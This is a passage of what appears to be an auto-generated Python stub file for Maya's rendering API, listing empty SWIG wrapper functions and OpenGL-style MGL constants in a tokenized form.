MHwTextureManager_registerTextureFile ( * args , ** kwargs ) : <EOL> pass <EOL> def MHwTextureManager_textureFile ( * args , ** kwargs ) : <EOL> pass <EOL> def MRenderUtil_getCommonRenderSettings ( * args , ** kwargs ) : <EOL> pass <EOL> def MRenderUtil_convertPsdFile ( * args , ** kwargs ) : <EOL> pass <EOL> def MRenderUtil_mayaRenderState ( * args , ** kwargs ) : <EOL> pass <EOL> def MRenderUtil_renderObjectItem ( * args , ** kwargs ) : <EOL> pass <EOL> def weakref_proxy ( * args , ** kwargs ) : <EOL> """<STR_LIT>""" <EOL> pass <EOL> def MVaryingParameterList_swigregister ( * args , ** kwargs ) : <EOL> pass <EOL> def MHwTextureManager_swigregister ( * args , ** kwargs ) : <EOL> pass <EOL> def MFnImageSource_className ( * args , ** kwargs ) : <EOL> pass <EOL> def MRenderUtil_generatingIprFile ( * args , ** kwargs ) : <EOL> pass <EOL> def MCommonRenderSettingsData_getPostRenderFrameCmd ( * args , ** kwargs ) : <EOL> pass <EOL> def _swig_setattr_nondynamic ( self , class_type , name , value , static = <NUM_LIT:1> ) : <EOL> pass <EOL> def MGeometryManager_referenceDefaultGeometry ( * args , ** kwargs ) : <EOL> pass <EOL> def RV_AOV_swigregister ( * args , ** kwargs ) : <EOL> pass <EOL> def MFnImageSource_swigregister ( * args , ** kwargs ) : <EOL> pass <EOL> def MGeometryManager_swigregister ( * args , ** kwargs ) : <EOL> pass <EOL> def MRenderShadowData_swigregister ( * args , ** kwargs ) : <EOL> pass <EOL> def MRenderUtil_mainBeautyPassName ( * args , ** kwargs ) : <EOL> pass <EOL> def MRenderView_getRenderRegion ( * args , ** kwargs ) : <EOL> pass <EOL> def MRenderView_endRender ( * args , ** kwargs ) : <EOL> pass <EOL> def MRenderView_refresh ( * args , ** kwargs ) : <EOL> pass <EOL> def MHwTextureManager_glBind ( * args , ** kwargs ) : <EOL> pass <EOL> def MRenderUtil_raytrace ( * args , ** kwargs ) : <EOL> pass <EOL> def MGeometryList_swigregister ( * args , ** kwargs ) : <EOL> pass <EOL> def _swig_repr ( self ) : <EOL> pass <EOL> def MRenderUtil_exactImagePlaneFileName ( * args , ** kwargs ) : <EOL> pass <EOL> def MRenderCallback_swigregister ( * args , ** kwargs ) : <EOL> pass <EOL> def MDrawProcedureBase_swigregister ( * args , ** kwargs ) : <EOL> pass <EOL> def MGeometryManager_dereferenceDefaultGeometry ( * args , ** kwargs ) : <EOL> pass <EOL> def MCommonRenderSettingsData_className ( * args , ** kwargs ) : <EOL> pass <EOL> def MRenderUtil_inCurrentRenderLayer ( * args , ** kwargs ) : <EOL> pass <EOL> def MHwrCallback_addCallback ( * args , ** kwargs ) : <EOL> pass <EOL> def MUniformParameter_swigregister ( * args , ** kwargs ) : <EOL> pass <EOL> MGL_RENDERBUFFER_STENCIL_SIZE = <NUM_LIT> <EOL> MGL_LUMINANCE6_ALPHA2 = <NUM_LIT> <EOL> MGL_OPERAND3_ALPHA_NV = <NUM_LIT> <EOL> kMGLext_ARB_point_parameters = <NUM_LIT:30> <EOL> MGL_REG_16_ATI = <NUM_LIT> <EOL> MGL_DOT3_RGB_EXT = <NUM_LIT> <EOL> MGL_RENDERBUFFER_DEPTH_SIZE = <NUM_LIT> <EOL> MGL_OPERAND3_RGB_NV = <NUM_LIT> <EOL> MGL_REG_15_ATI = <NUM_LIT> <EOL> MGL_RENDERBUFFER_ALPHA_SIZE = <NUM_LIT> <EOL> MGL_COMPRESSED_RGBA_S3TC_DXT1_EXT = <NUM_LIT> <EOL> MGL_LEFT = <NUM_LIT> <EOL> MGL_ALPHA_BITS = <NUM_LIT> <EOL> MGL_VIEWPORT_BIT = <NUM_LIT> <EOL> MGL_STACK_OVERFLOW = <NUM_LIT> <EOL> MGL_RENDERBUFFER_BLUE_SIZE = <NUM_LIT> <EOL> MGL_NEAREST = <NUM_LIT> <EOL> MGL_INVALID_OPERATION = <NUM_LIT> <EOL> kMGLext_ATI_pixel_format_float = <NUM_LIT> <EOL> MGL_RENDERBUFFER_GREEN_SIZE = <NUM_LIT> <EOL> MGL_PROXY_TEXTURE_CUBE_MAP = <NUM_LIT> <EOL> MGL_COMBINE4_NV = <NUM_LIT> <EOL> MGL_INVALID_VALUE = <NUM_LIT> <EOL> MGL_CURRENT_MATRIX_NV = <NUM_LIT> <EOL> MGL_RENDERBUFFER_RED_SIZE = <NUM_LIT> <EOL> MGL_RED_BITS = <NUM_LIT> <EOL> MGL_POINT_FADE_THRESHOLD_SIZE_ARB = <NUM_LIT> <EOL> MGL_REG_11_ATI = <NUM_LIT> <EOL> MGL_STENCIL_INDEX16 = <NUM_LIT> <EOL> MGL_LUMINANCE4_ALPHA4 = <NUM_LIT> <EOL> MGL_INDEX_BITS = <NUM_LIT> <EOL> MGL_AUX3 = <NUM_LIT> <EOL> MGL_DOT3_RGB_ARB = <NUM_LIT> <EOL> MGL_STENCIL_INDEX8 = <NUM_LIT> <EOL> MGL_OPERAND0_ALPHA_EXT = <NUM_LIT> <EOL> MGL_VARIANT_DATATYPE_EXT = <NUM_LIT> <EOL> MGL_ACCUM_ALPHA_BITS = <NUM_LIT> <EOL> MGL_REG_9_ATI = <NUM_LIT> <EOL> MGL_STENCIL_INDEX4 = <NUM_LIT> <EOL> MGL_DEPTH_BITS = <NUM_LIT> <EOL> MGL_MAX_CLIENT_ATTRIB_STACK_DEPTH = <NUM_LIT> <EOL> MGL_AUX1 = <NUM_LIT> <EOL> MGL_STENCIL_INDEX1 = <NUM_LIT> <EOL> MGL_MAX_VIEWPORT_DIMS = <NUM_LIT> <EOL> MGL_UNSIGNED_NORMALIZED = <NUM_LIT> <EOL> MGL_REG_7_ATI = <NUM_LIT> <EOL> MGL_RENDERBUFFER_INTERNAL_FORMAT = <NUM_LIT> <EOL> MGL_STACK_UNDERFLOW = <NUM_LIT> <EOL> MGL_MAX_TEXTURE_STACK_DEPTH = <NUM_LIT> <EOL> MGL_FRONT_AND_BACK = <NUM_LIT> <EOL> MGL_TEXTURE6 = <NUM_LIT> <EOL> MGL_PACK_IMAGE_HEIGHT_EXT = <NUM_LIT> <EOL> MGL_MAX_PROJECTION_STACK_DEPTH = <NUM_LIT> <EOL> MGL_MATRIX11 = <NUM_LIT> <EOL> MGL_PROGRAM_ERROR_STRING_NV = <NUM_LIT> <EOL> MGL_VERTEX_ATTRIB_ARRAY_ENABLED = <NUM_LIT> <EOL> MGL_4_BYTES = <NUM_LIT> <EOL> MGL_RENDERBUFFER_WIDTH = <NUM_LIT> <EOL> MGL_LUMINANCE16 = <NUM_LIT> <EOL> MGL_MAX_NAME_STACK_DEPTH = <NUM_LIT> <EOL> MGL_DOUBLE = <NUM_LIT> <EOL> MGL_COMPRESSED_TEXTURE_FORMATS_ARB = <NUM_LIT> <EOL> MGL_PACK_SKIP_IMAGES_EXT = <NUM_LIT> <EOL> MGL_AUX0 = <NUM_LIT> <EOL> MGL_SOURCE0_ALPHA_EXT = <NUM_LIT> <EOL> MGL_VARIANT_VALUE_EXT = <NUM_LIT> <EOL> MGL_HALF_FLOAT = <NUM_LIT> <EOL> MGL_PACK_SKIP_IMAGES = <NUM_LIT> <EOL> MGL_SOURCE3_ALPHA_NV = <NUM_LIT> <EOL> MGL_MAX_ATTRIB_STACK_DEPTH = <NUM_LIT> <EOL> MGL_FRONT_LEFT = <NUM_LIT> <EOL> kMGLext_EXT_transform_feedback = <NUM_LIT> <EOL> MGL_STENCIL_ATTACHMENT = <NUM_LIT> <EOL> MGL_MAX_PIXEL_MAP_TABLE = <NUM_LIT> <EOL> MGL_TEXTURE_DEPTH_TYPE = <NUM_LIT> <EOL> MGL_FRONT_RIGHT = <NUM_LIT> <EOL> MGL_UNSIGNED_INT_10_10_10_2_EXT = <NUM_LIT> <EOL> MGL_MAX_TEXTURE_IMAGE_UNITS_ARB = <NUM_LIT> <EOL> MGL_OUTPUT_TEXTURE_COORD18_EXT = <NUM_LIT> <EOL> MGL_MAX_TEXTURE_SIZE = <NUM_LIT> <EOL> MGL_BACK_LEFT = <NUM_LIT> <EOL> MGL_TEXTURE5 = <NUM_LIT> <EOL> MGL_UNSIGNED_INT_8_8_8_8_EXT = <NUM_LIT> <EOL> MGL_PREVIOUS_EXT = <NUM_LIT> <EOL> MGL_MATRIX10 = <NUM_LIT> <EOL> MGL_FRAGMENT_SHADER_ATI = <NUM_LIT> <EOL> MGL_UNSIGNED_SHORT_5_5_5_1_EXT = <NUM_LIT> <EOL> MGL_LUMINANCE12 = <NUM_LIT> <EOL> MGL_PRIMARY_COLOR_EXT = <NUM_LIT> <EOL> kMGLext_imaging_subset = <NUM_LIT:20> <EOL> MGL_CLEAR = <NUM_LIT> <EOL> MGL_NUM_COMPRESSED_TEXTURE_FORMATS_ARB = <NUM_LIT> <EOL> MGL_UNSIGNED_SHORT_4_4_4_4_EXT = <NUM_LIT> <EOL> MGL_CONSTANT_EXT = <NUM_LIT> <EOL> MGL_TEXTURE30 = <NUM_LIT> <EOL> MGL_COMPILE_AND_EXECUTE = <NUM_LIT> <EOL> MGL_UNSIGNED_BYTE_3_3_2_EXT = <NUM_LIT> <EOL> MGL_BLUE_BITS = <NUM_LIT> <EOL> MGL_TEXTURE_3D_EXT = <NUM_LIT> <EOL> MGL_INTERPOLATE_EXT = <NUM_LIT> <EOL> MGL_INVARIANT_DATATYPE_EXT = <NUM_LIT> <EOL> MGL_INDEX_ARRAY_STRIDE_EXT = <NUM_LIT> <EOL> MGL_FUNC_REVERSE_SUBTRACT_EXT = <NUM_LIT> <EOL> MGL_TEXTURE_INTENSITY_TYPE = <NUM_LIT> <EOL> MGL_QUADRATIC_ATTENUATION = <NUM_LIT> <EOL> kMGLext_NVX_gpu_memory_info = <NUM_LIT> <EOL> MGL_FUNC_REVERSE_SUBTRACT = <NUM_LIT> <EOL> MGL_POINT_SIZE = <NUM_LIT> <EOL> MGL_RGB_SCALE_EXT = <NUM_LIT> <EOL> MGL_ALPHA_BIAS = <NUM_LIT> <EOL> MGL_MAX_PROGRAM_TEX_INDIRECTIONS_ARB = <NUM_LIT> <EOL> MGL_LINEAR_ATTENUATION = <NUM_LIT> <EOL> MGL_MATRIX6_NV = <NUM_LIT> <EOL> MGL_FUNC_SUBTRACT_EXT = <NUM_LIT> <EOL> MGL_CULL_FACE = <NUM_LIT> <EOL> MGL_COMBINE_ALPHA_EXT = <NUM_LIT> <EOL> MGL_CLIP_VOLUME_CLIPPING_HINT_EXT = <NUM_LIT> <EOL> MGL_INT = <NUM_LIT> <EOL> MGL_TEXTURE1_ARB = <NUM_LIT> <EOL> MGL_FUNC_SUBTRACT = <NUM_LIT> <EOL> MGL_LUMINANCE8 = <NUM_LIT> <EOL> MGL_COMBINE_RGB_EXT = <NUM_LIT> <EOL> MGL_SPOT_CUTOFF = <NUM_LIT> <EOL> MGL_FILL = <NUM_LIT> <EOL> MGL_TEXTURE_BLUE_SIZE = <NUM_LIT> <EOL> MGL_VERTEX_ATTRIB_ARRAY5_NV = <NUM_LIT> <EOL> MGL_BLEND_EQUATION_EXT = <NUM_LIT> <EOL> MGL_COMBINE_EXT = <NUM_LIT> <EOL> MGL_TEXTURE29 = <NUM_LIT> <EOL> MGL_SPOT_EXPONENT = <NUM_LIT> <EOL> kMGLext_NV_transform_feedback = <NUM_LIT> <EOL> MGL_DYNAMIC_COPY_ARB = <NUM_LIT> <EOL> MGL_BLEND_EQUATION = <NUM_LIT> <EOL> MGL_GREEN_BITS = <NUM_LIT> <EOL> MGL_EMBOSS_MAP_NV = <NUM_LIT> <EOL> MGL_2_BYTES = <NUM_LIT> <EOL> kMGLext_WMGL_ARB_pixel_format = <NUM_LIT> <EOL> MGL_MAX_EXT = <NUM_LIT> <EOL> kMGLext_ATI_fragment_shader = <NUM_LIT> <EOL> MGL_UNPACK_IMAGE_HEIGHT = <NUM_LIT> <EOL> MGL_EMBOSS_CONSTANT_NV = <NUM_LIT> <EOL> MGL_TEXTURE_LUMINANCE_TYPE = <NUM_LIT> <EOL> MGL_LOCAL_CONSTANT_DATATYPE_EXT = <NUM_LIT> <EOL> MGL_POSITION = <NUM_LIT> <EOL> MGL_LERP_ATI = <NUM_LIT> <EOL> MGL_REG_12_ATI = <NUM_LIT> <EOL> MGL_COMPRESSED_LUMINANCE_ALPHA = <NUM_LIT> <EOL> MGL_EMBOSS_LIGHT_NV = <NUM_LIT> <EOL> MGL_SPECULAR = <NUM_LIT> <EOL> MGL_TEXTURE3 = <NUM_LIT> <EOL> MGL_MIN_EXT = <NUM_LIT> <EOL> MGL_PRIMITIVE_RESTART_INDEX_NV = <NUM_LIT> <EOL> MGL_MATRIX8 = <NUM_LIT> <EOL> kMGLext_ARB_texture_env_crossbar = <NUM_LIT> <EOL> MGL_DIFFUSE = <NUM_LIT> <EOL> kMGLext_MGLX_destroy_window = <NUM_LIT> <EOL> MGL_DOT4_ATI = <NUM_LIT> <EOL> MGL_LUMINANCE4 = <NUM_LIT> <EOL> MGL_PRIMITIVE_RESTART_NV = <NUM_LIT> <EOL> MGL_AMBIENT = <NUM_LIT> <EOL> MGL_CON_5_ATI = <NUM_LIT> <EOL> MGL_FUNC_ADD_EXT = <NUM_LIT> <EOL> MGL_COMBINER7_NV = <NUM_LIT> <EOL> MGL_TEXTURE28 = <NUM_LIT> <EOL> MGL_LIGHT7 = <NUM_LIT> <EOL> MGL_SUB_ATI = <NUM_LIT> <EOL> MGL_OPERAND2_ALPHA_EXT = <NUM_LIT> <EOL> MGL_COMBINER6_NV = <NUM_LIT> <EOL> MGL_LIGHT6 = <NUM_LIT> <EOL> kMGLext_WMGL_ARB_pbuffer = <NUM_LIT> <EOL> MGL_BLEND_COLOR_EXT = <NUM_LIT> <EOL> MGL_COMBINER5_NV = <NUM_LIT> <EOL> MGL_TEXTURE_ALPHA_TYPE = <NUM_LIT> <EOL> MGL_LIGHT5 = <NUM_LIT> <EOL> kMGLext_ARB_fragment_program_shadow = <NUM_LIT> <EOL> MGL_ADD_ATI = <NUM_LIT> <EOL> MGL_MAX_PROGRAM_NATIVE_TEX_INSTRUCTIONS_ARB = <NUM_LIT> <EOL> MGL_COMBINER4_NV = <NUM_LIT> <EOL> MGL_LIGHT4 = <NUM_LIT> <EOL> MGL_ONE_MINUS_CONSTANT_ALPHA_EXT = <NUM_LIT> <EOL> MGL_LINE_RESET_TOKEN = <NUM_LIT> <EOL> MGL_COMBINER3_NV = <NUM_LIT> <EOL> MGL_MATRIX7 = <NUM_LIT> <EOL> MGL_LIGHT3 = <NUM_LIT> <EOL> MGL_ONE_MINUS_CONSTANT_ALPHA = <NUM_LIT> <EOL> MGL_MIRROR_CLAMP_ATI = <NUM_LIT> <EOL> MGL_COMBINER2_NV = <NUM_LIT> <EOL> MGL_LIGHT2 = <NUM_LIT> <EOL> MGL_LIGHT_MODEL_TWO_SIDE = <NUM_LIT> <EOL> MGL_CON_30_ATI = <NUM_LIT> <EOL> MGL_TEXTURE27 = <NUM_LIT> <EOL> MGL_LIGHT1 = <NUM_LIT> <EOL> MGL_UNSIGNED_INT = <NUM_LIT> <EOL> MGL_CON_29_ATI = <NUM_LIT> <EOL> MGL_OPERAND1_ALPHA_EXT = <NUM_LIT> <EOL> MGL_UNSIGNED_INT_S8_S8_8_8_REV_NV = <NUM_LIT> <EOL> MGL_LIGHT0 = <NUM_LIT> <EOL> MGL_ONE_MINUS_CONSTANT_COLOR_EXT = <NUM_LIT> <EOL> MGL_EYE_LINEAR = <NUM_LIT> <EOL> MGL_NICEST = <NUM_LIT> <EOL> MGL_ONE_MINUS_CONSTANT_COLOR = <NUM_LIT> <EOL> MGL_REG_10_ATI = <NUM_LIT> <EOL> MGL_FASTEST = <NUM_LIT> <EOL> MGL_CON_26_ATI = <NUM_LIT> <EOL> MGL_MATRIX6 = <NUM_LIT> <EOL> MGL_FRAGMENT_PROGRAM_BINDING_NV = <NUM_LIT> <EOL> MGL_DONT_CARE = <NUM_LIT> <EOL> MGL_CONSTANT_COLOR = <NUM_LIT> <EOL> MGL_TEXTURE_MAG_SIZE_NV = <NUM_LIT> <EOL> MGL_TEXTURE_BORDER = <NUM_LIT> <EOL> MGL_MAX_VARYING_FLOATS_ARB = <NUM_LIT> <EOL> MGL_CON_24_ATI = <NUM_LIT> <EOL> MGL_TEXTURE26 = <NUM_LIT> <EOL> MGL_TEXTURE_BORDER_COLOR = <NUM_LIT> <EOL> MGL_CON_23_ATI = <NUM_LIT> <EOL> MGL_SUBPIXEL_BITS = <NUM_LIT> <EOL> MGL_TEXTURE_INTERNAL_FORMAT = <NUM_LIT> <EOL> MGL_PIXEL_MAP_A_TO_A = <NUM_LIT> <EOL> kMGLext_texture_compression_s3tc = <NUM_LIT> <EOL> MGL_POLYGON = <NUM_LIT:9> <EOL> MGL_MAX_COLOR_ATTACHMENTS = <NUM_LIT> <EOL> MGL_TEXTURE_HEIGHT = <NUM_LIT> <EOL> MGL_BIAS_BIT_ATI = <NUM_LIT:8> <EOL> MGL_AUX2 = <NUM_LIT> <EOL> MGL_TEXTURE_WIDTH = <NUM_LIT> <EOL> MGL_QUADS = <NUM_LIT:7> <EOL> MGL_SAMPLE_COVERAGE_INVERT_ARB = <NUM_LIT> <EOL> MGL_PROGRAM_ERROR_POSITION_NV = <NUM_LIT> <EOL> MGL_VERTEX_ARRAY_RANGE_WITHOUT_FLUSH_NV = <NUM_LIT> <EOL> MGL_CON_19_ATI = <NUM_LIT> <EOL> MGL_TEXTURE_DT_SIZE_NV = <NUM_LIT> <EOL> kMGLext_ARB_texgen_reflection = <NUM_LIT> <EOL> MGL_TEXTURE_COORD_ARRAY_POINTER_EXT = <NUM_LIT> <EOL> MGL_SELECTION_BUFFER_POINTER = <NUM_LIT> <EOL> MGL_CON_2_ATI = <NUM_LIT> <EOL> MGL_CON_18_ATI = <NUM_LIT> <EOL> MGL_TEXTURE25 = <NUM_LIT> <EOL> MGL_FEEDBACK_BUFFER_TYPE = <NUM_LIT> <EOL> MGL_CON_17_ATI = <NUM_LIT> <EOL> MGL_OPERAND2_RGB_EXT = <NUM_LIT> <EOL> MGL_COLOR_ARRAY_POINTER_EXT = <NUM_LIT> <EOL> MGL_FEEDBACK_BUFFER_SIZE = <NUM_LIT> <EOL> MGL_PIXEL_COUNTER_BITS_ARB = <NUM_LIT> <EOL> MGL_LINE_STRIP = <NUM_LIT:3> <EOL> MGL_NORMAL_ARRAY_POINTER_EXT = <NUM_LIT> <EOL> MGL_TEXTURE_ENV_COLOR = <NUM_LIT> <EOL> MGL_FEEDBACK_BUFFER_POINTER = <NUM_LIT> <EOL> MGL_CON_15_ATI = <NUM_LIT> <EOL> MGL_CURRENT_RASTER_TEXTURE_COORDS = <NUM_LIT> <EOL> MGL_VERTEX_ARRAY_POINTER_EXT = <NUM_LIT> <EOL> MGL_PROGRAM_TARGET_NV = <NUM_LIT> <EOL> MGL_TEXTURE_RED_TYPE = <NUM_LIT> <EOL> MGL_2X_BIT_ATI = <NUM_LIT:1> <EOL> MGL_EDGE_FLAG_ARRAY_COUNT_EXT = <NUM_LIT> <EOL> MGL_MATRIX4 = <NUM_LIT> <EOL> MGL_ATTRIB_ARRAY_POINTER_NV = <NUM_LIT> <EOL> MGL_FALSE = <NUM_LIT:0> <EOL> MGL_TEXTURE_DS_SIZE_NV = <NUM_LIT> <EOL> MGL_2D = <NUM_LIT> <EOL> MGL_EDGE_FLAG_ARRAY_STRIDE_EXT = <NUM_LIT> <EOL> MGL_MAP2_GRID_SEGMENTS = <NUM_LIT> <EOL> MGL_CON_1_ATI = <NUM_LIT> <EOL> MGL_TEXTURE_GREEN_SIZE = <NUM_LIT> <EOL> MGL_CON_12_ATI = <NUM_LIT> <EOL> MGL_TEXTURE_COORD_ARRAY_COUNT_EXT = <NUM_LIT> <EOL> MGL_ZERO_EXT = <NUM_LIT> <EOL> MGL_MAP2_GRID_DOMAIN = <NUM_LIT> <EOL> kMGLext_NV_primitive_restart = <NUM_LIT> <EOL> MGL_DYNAMIC_READ_ARB = <NUM_LIT> <EOL> MGL_CON_11_ATI = <NUM_LIT> <EOL> MGL_TEXTURE_COORD_ARRAY_STRIDE_EXT = <NUM_LIT> <EOL> MGL_DOT3_ATI = <NUM_LIT> <EOL> MGL_MAP1_GRID_SEGMENTS = <NUM_LIT> <EOL> MGL_PIXEL_MAP_G_TO_G = <NUM_LIT> <EOL> MGL_CON_10_ATI = <NUM_LIT> <EOL> MGL_UNPACK_SKIP_IMAGES_EXT = <NUM_LIT> <EOL> MGL_TEXTURE_COORD_ARRAY_TYPE_EXT = <NUM_LIT> <EOL> MGL_MAX_CUBE_MAP_TEXTURE_SIZE_ARB = <NUM_LIT> <EOL> MGL_LOCAL_CONSTANT_VALUE_EXT = <NUM_LIT> <EOL> MGL_MAP1_GRID_DOMAIN = <NUM_LIT> <EOL> MGL_CON_9_ATI = <NUM_LIT> <EOL> MGL_MAX_PROGRAM_ALU_INSTRUCTIONS_ARB = <NUM_LIT> <EOL> MGL_TEXTURE_COORD_ARRAY_SIZE_EXT = <NUM_LIT> <EOL> MGL_CURRENT_MATRIX_STACK_DEPTH_NV = <NUM_LIT> <EOL> MGL_POLYGON_OFFSET_POINT = <NUM_LIT> <EOL> MGL_MAX_VERTEX_UNIFORM_COMPONENTS_ARB = <NUM_LIT> <EOL> MGL_FEEDBACK = <NUM_LIT> <EOL> MGL_INDEX_ARRAY_COUNT_EXT = <NUM_LIT> <EOL> MGL_MATRIX3 = <NUM_LIT> <EOL> MGL_TEXTURE_CUBE_MAP_NEGATIVE_Z_ARB = <NUM_LIT> <EOL> MGL_MATRIX7_NV = <NUM_LIT> <EOL> kMGLext_MGLX_create_new_context = <NUM_LIT> <EOL> MGL_VERTEX_ID_NV = <NUM_LIT> <EOL> MGL_CON_7_ATI = <NUM_LIT> <EOL> MGL_TEXTURE_LO_SIZE_NV = <NUM_LIT> <EOL> MGL_NUM_LOOPBACK_COMPONENTS_ATI = <NUM_LIT> <EOL> MGL_COMPRESSED_LUMINANCE_ALPHA_ARB = <NUM_LIT> <EOL> MGL_CON_6_ATI = <NUM_LIT> <EOL> MGL_INDEX_ARRAY_TYPE_EXT = <NUM_LIT> <EOL> MGL_TEXTURE23 = <NUM_LIT> <EOL> MGL_MATRIX5_NV = <NUM_LIT> <EOL> MGL_LINE = <NUM_LIT> <EOL> MGL_OPERAND0_RGB_EXT = <NUM_LIT> <EOL> MGL_UNSIGNED_SHORT = <NUM_LIT> <EOL> MGL_COLOR_ARRAY_COUNT_EXT = <NUM_LIT> <EOL> MGL_MATRIX4_NV = <NUM_LIT> <EOL> MGL_PIXEL_COUNT_NV = <NUM_LIT> <EOL> MGL_POINT = <NUM_LIT> <EOL> MGL_COLOR_ARRAY_STRIDE_EXT = <NUM_LIT> <EOL> MGL_FRAMEBUFFER_INCOMPLETE_DRAW_BUFFER = <NUM_LIT> <EOL> MGL_MATRIX3_NV = <NUM_LIT> <EOL> kMGLext_ARB_color_buffer_float = <NUM_LIT> <EOL> MGL_CON_3_ATI = <NUM_LIT> <EOL> MGL_REG_6_ATI = <NUM_LIT> <EOL> MGL_COLOR_ARRAY_TYPE_EXT = <NUM_LIT> <EOL> MGL_CON_13_ATI = <NUM_LIT> <EOL> MGL_MATRIX2_NV = <NUM_LIT> <EOL> MGL_LUMINANCE_ALPHA = <NUM_LIT> <EOL> MGL_COPY_PIXEL_TOKEN = <NUM_LIT> <EOL> MGL_COLOR_ARRAY_SIZE_EXT = <NUM_LIT> <EOL> MGL_MATRIX2 = <NUM_LIT> <EOL> MGL_MATRIX1_NV = <NUM_LIT> <EOL> MGL_LUMINANCE = <NUM_LIT> <EOL> MGL_RENDERBUFFER_HEIGHT = <NUM_LIT> <EOL> MGL_NORMAL_ARRAY_COUNT_EXT = <NUM_LIT> <EOL> MGL_MATRIX0_NV = <NUM_LIT> <EOL> MGL_FLOAT_MAT3_ARB = <NUM_LIT> <EOL> MGL_TEXTURE_ENV_MODE = <NUM_LIT> <EOL> MGL_RGBA = <NUM_LIT> <EOL> MGL_NORMAL_ARRAY_STRIDE_EXT = <NUM_LIT> <EOL> MGL_NEGATIVE_Z_EXT = <NUM_LIT> <EOL> MGL_MAX_TRACK_MATRICES_NV = <NUM_LIT> <EOL> MGL_RGB = <NUM_LIT> <EOL> MGL_SOURCE2_ALPHA_EXT = <NUM_LIT> <EOL> MGL_NORMAL_ARRAY_TYPE_EXT = <NUM_LIT> <EOL> MGL_REG_8_ATI = <NUM_LIT> <EOL> MGL_MAX_TRACK_MATRIX_STACK_DEPTH_NV = <NUM_LIT> <EOL> MGL_CURRENT_OCCLUSION_QUERY_ID_NV = <NUM_LIT> <EOL> MGL_ALPHA = <NUM_LIT> <EOL> MGL_CLAMP_TO_BORDER_SGIS = <NUM_LIT> <EOL> MGL_MAX_PROGRAM_NATIVE_TEMPORARIES = <NUM_LIT> <EOL> MGL_MODULATE = <NUM_LIT> <EOL> MGL_INVERSE_TRANSPOSE_NV = <NUM_LIT> <EOL> MGL_BLUE = <NUM_LIT> <EOL> MGL_PROGRAM_NATIVE_TEX_INSTRUCTIONS_ARB = <NUM_LIT> <EOL> MGL_PROGRAM_NATIVE_TEMPORARIES = <NUM_LIT> <EOL> MGL_TRANSPOSE_NV = <NUM_LIT> <EOL> MGL_GREEN = <NUM_LIT> <EOL> MGL_MAX_PROGRAM_TEMPORARIES = <NUM_LIT> <EOL> MGL_PACK_SKIP_PIXELS = <NUM_LIT> <EOL> MGL_MAX_TEXTURE_IMAGE_UNITS_NV = <NUM_LIT> <EOL> MGL_INVERSE_NV = <NUM_LIT> <EOL> MGL_RED = <NUM_LIT> <EOL> MGL_PACK_IMAGE_HEIGHT = <NUM_LIT> <EOL> MGL_PROGRAM_TEMPORARIES = <NUM_LIT> <EOL> MGL_VERTEX_SHADER_LOCAL_CONSTANTS_EXT = <NUM_LIT> <EOL> MGL_IDENTITY_NV = <NUM_LIT> <EOL> MGL_COMPRESSED_ALPHA_ARB = <NUM_LIT> <EOL> MGL_DEPTH_COMPONENT = <NUM_LIT> <EOL> MGL_MAX_PROGRAM_NATIVE_INSTRUCTIONS = <NUM_LIT> <EOL> MGL_CLIP_PLANE5 = <NUM_LIT> <EOL> MGL_MODELVIEW_PROJECTION_NV = <NUM_LIT> <EOL> MGL_PROGRAM_PARAMETER_NV = <NUM_LIT> <EOL> MGL_STENCIL_INDEX = <NUM_LIT> <EOL> MGL_MATRIX26 = <NUM_LIT> <EOL> MGL_TEXTURE_BLUE_TYPE = <NUM_LIT> <EOL> MGL_PROGRAM_NATIVE_INSTRUCTIONS = <NUM_LIT> <EOL> MGL_PROGRAM_STRING_NV = <NUM_LIT> <EOL> MGL_PIXEL_MAP_I_TO_B = <NUM_LIT> <EOL> kMGLext_EXT_texture_filter_anisotropic = <NUM_LIT> <EOL> MGL_EDGE_FLAG_ARRAY_BUFFER_BINDING_ARB = <NUM_LIT> <EOL> MGL_COLOR_INDEX = <NUM_LIT> <EOL> MGL_INDEX_ARRAY_EXT = <NUM_LIT> <EOL> MGL_SIGNED_RGB8_NV = <NUM_LIT> <EOL> MGL_PROGRAM_LENGTH_NV = <NUM_LIT> <EOL> MGL_STENCIL = <NUM_LIT> <EOL> MGL_CURRENT_NORMAL = <NUM_LIT> <EOL> MGL_COLOR_ARRAY_EXT = <NUM_LIT> <EOL> MGL_CURRENT_ATTRIB_NV = <NUM_LIT> <EOL> MGL_DEPTH = <NUM_LIT> <EOL> MGL_PROGRAM_BINDING = <NUM_LIT> <EOL> MGL_MATRIX0 = <NUM_LIT> <EOL> MGL_ATTRIB_ARRAY_TYPE_NV = <NUM_LIT> <EOL> MGL_OPERAND1_RGB_EXT = <NUM_LIT> <EOL> MGL_COLOR = <NUM_LIT> <EOL> MGL_RENDERBUFFER = <NUM_LIT> <EOL> MGL_PROGRAM_FORMAT = <NUM_LIT> <EOL> MGL_DOT3_RGBA_EXT = <NUM_LIT> <EOL> MGL_VERTEX_WEIGHT_ARRAY_POINTER_EXT = <NUM_LIT> <EOL> MGL_TEXTURE = <NUM_LIT> <EOL> MGL_MAX_3D_TEXTURE_SIZE_EXT = <NUM_LIT> <EOL> MGL_NEGATIVE_X_EXT = <NUM_LIT> <EOL> MGL_REG_19_ATI = <NUM_LIT> <EOL> MGL_PROJECTION = <NUM_LIT> <EOL> MGL_MAX_MODELVIEW_STACK_DEPTH = <NUM_LIT> <EOL> MGL_EXP = <NUM_LIT> <EOL> MGL_MAX_3D_TEXTURE_SIZE = <NUM_LIT> <EOL> MGL_FLOAT_RGBA_MODE_NV = <NUM_LIT> <EOL> MGL_RGBA_UNSIGNED_DOT_PRODUCT_MAPPING_NV = <NUM_LIT> <EOL> MGL_CURRENT_VERTEX_ATTRIB = <NUM_LIT> <EOL> MGL_R = <NUM_LIT> <EOL> MGL_COLOR_INDEXES = <NUM_LIT> <EOL> MGL_PROGRAM_TEX_INDIRECTIONS_ARB = <NUM_LIT> <EOL> MGL_TEXTURE_WRAP_R = <NUM_LIT> <EOL> MGL_BLUE_BIAS = <NUM_LIT> <EOL> MGL_MAP2_VERTEX_ATTRIB14_4_NV = <NUM_LIT> <EOL> MGL_TEXTURE_DEPTH_EXT = <NUM_LIT> <EOL> MGL_PROGRAM_ERROR_STRING = <NUM_LIT> <EOL> MGL_MAP2_VERTEX_ATTRIB13_4_NV = <NUM_LIT> <EOL> MGL_FRAMEBUFFER = <NUM_LIT> <EOL> MGL_OUT_OF_MEMORY = <NUM_LIT> <EOL> MGL_TEXTURE_DEPTH = <NUM_LIT> <EOL> MGL_OP_SUB_EXT = <NUM_LIT> <EOL> MGL_VERTEX_WEIGHT_ARRAY_STRIDE_EXT = <NUM_LIT> <EOL> MGL_EMISSION = <NUM_LIT> 